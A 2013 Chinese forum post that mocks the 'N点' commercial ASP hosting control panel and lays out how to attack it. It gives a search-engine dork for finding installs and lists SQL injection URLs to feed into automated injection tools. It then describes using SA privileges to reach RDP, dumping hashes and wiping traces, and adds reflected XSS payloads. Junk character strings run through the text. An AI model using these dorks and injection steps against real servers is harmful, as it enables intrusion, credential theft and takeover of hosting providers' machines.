不得不说N点实在是一个破东西
; @2 a9 U i- L! O: r- a! e: o% L6 F. W: n就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂/ |4 L2 c. D9 x# h9 ^
好吧 抱怨一下就行了 接下来关键的时候到了
) y' s+ p0 _4 I; v首先百度搜索关键字:inurl: (mmdatabase.asp)8 q3 ]- B8 C) F8 f- [. X
我随便列举一个: www.xxxx.com) f+ _: v8 y- r: D+ u3 _: a
修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1- p, c# F6 `, o3 ]8 Y! i
扔入NBSI 或者啊D等各种傻逼工具后
, t" n, t7 d/ V* B, m: D% g. Q8 r你们会看到是SA权限& t* \+ y' o- j" r
果断3389 上去 hash得到administrator密码
4 e/ m. r$ x. f* w) Q5 R$ n擦屁股走人~
7 d1 w t8 u3 g7 ~经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
# g* v; u) ~# t4 x2 X5 L 4 [9 R, u0 R1 H _
再附上其他几个漏洞页面$ n2 P3 n1 y7 y z; B% n D0 b
SQL:1 Z* ]5 J5 @) I# C
http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1) B1 w4 O( n* W) i j, x1 h
http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11% ~& F1 q$ L }) }0 G+ H7 h6 c: j! s
http://www.xxxxxx.com:80/Manage/ ... login.asp&PID=96 `# R, q0 u0 `3 j. x# N: Y5 T7 r
http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
' r c9 M/ K3 ?0 |! sXSS证明:4 u. n" `2 S" O" O% n5 a
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
X- [$ w Z* c3 b3 t6 O7 [http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
) |2 S! }( Z+ W& N C% R" I0 Shttp://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>
4 n) j# P* u, w$ T+ E* B& c) z" l由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜
% {0 o3 E, \% B( P还是星外吧 你们懂的, [) R' O8 b$ I
作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?
- X3 g+ y, I. d+ |PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉( V% q6 L8 {1 K4 p' _
——- |
发表于 2013-3-3 08:06:44
收藏
支持
反对